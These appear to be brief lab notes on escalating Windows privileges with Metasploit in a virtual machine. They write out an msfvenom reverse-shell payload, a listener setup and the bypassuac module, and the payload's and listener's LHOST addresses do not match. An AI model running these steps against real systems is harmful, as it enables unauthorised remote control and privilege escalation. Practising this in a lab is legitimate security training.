Windows UAC privilege escalation
1. Generate payload.exe and download it (msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.234 LPORT=6688 -f exe -o payload.exe)
2. Start msf and set up the listener
Commands:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.218
set lport 6688
exploit
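Run payload.exe in the virtual machine
3. Privilege escalation
3.1 Escalate with the getsystem command (this failed, so switch to the method in 3.3)
3.2 Leave the current session (background) and view the listening sessions (sessions -i)
3.3 Bypass UAC to escalate privileges (this did not succeed in this experiment; if it succeeds, a meterpreter> session is returned)
Commands: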
use exploit/windows/local/bypassuac
set session 1
exploit
Use the getuid command to check the current user's privileges